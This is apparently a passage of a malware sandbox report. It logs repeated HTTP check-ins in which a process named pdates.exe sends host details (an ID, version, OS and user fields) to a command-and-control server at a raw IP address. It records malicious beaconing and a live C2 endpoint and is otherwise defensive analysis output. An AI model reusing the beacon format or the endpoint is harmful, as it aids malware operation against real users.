Jul 27, 2023 01:35:03.876533985 CEST	4078	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:03.925690889 CEST	4078	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
471	192.168.2.5	50191	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:04.100732088 CEST	4079	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:04.149221897 CEST	4079	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
472	192.168.2.5	50192	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:04.331115961 CEST	4080	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:04.379405975 CEST	4080	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
473	192.168.2.5	50193	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:04.980048895 CEST	4081	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:05.029568911 CEST	4081	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
474	192.168.2.5	50194	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:05.356295109 CEST	4082	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:05.404376984 CEST	4082	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
475	192.168.2.5	50195	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:05.694139957 CEST	4083	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:05.742090940 CEST	4083	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
476	192.168.2.5	50196	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:06.529524088 CEST	4084	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:06.579072952 CEST	4084	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
477	192.168.2.5	50197	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:08.156431913 CEST	4085	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:08.209136009 CEST	4085	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
478	192.168.2.5	50198	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:08.522572041 CEST	4086	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:08.571213961 CEST	4086	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
479	192.168.2.5	50199	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:08.753145933 CEST	4087	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:08.801218033 CEST	4087	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.5	49765	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:13.961833000 CEST	2893	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:14.010406971 CEST	2893	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
480	192.168.2.5	50200	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:08.989923954 CEST	4088	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:09.038420916 CEST	4101	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
481	192.168.2.5	50202	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:09.203795910 CEST	4107	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:09.252526045 CEST	4108	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
482	192.168.2.5	50203	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:09.485951900 CEST	4108	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:09.535618067 CEST	4109	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
483	192.168.2.5	50204	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:09.701885939 CEST	4109	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:09.751578093 CEST	4109	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
484	192.168.2.5	50205	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:12.938021898 CEST	4110	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:12.987503052 CEST	4111	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
485	192.168.2.5	50206	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:13.154913902 CEST	4111	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:13.203790903 CEST	4112	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
486	192.168.2.5	50207	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:13.371833086 CEST	4112	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:13.419878006 CEST	4113	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
487	192.168.2.5	50208	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:13.630388021 CEST	4113	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:13.679733992 CEST	4113	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
488	192.168.2.5	50209	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:13.841682911 CEST	4114	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:13.889502048 CEST	4114	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
489	192.168.2.5	50210	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:14.069689989 CEST	4115	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:14.118407965 CEST	4115	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.5	49766	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:14.350761890 CEST	2894	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:14.399617910 CEST	2894	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
490	192.168.2.5	50211	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:14.334136009 CEST	4116	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:14.383183956 CEST	4116	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
491	192.168.2.5	50212	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
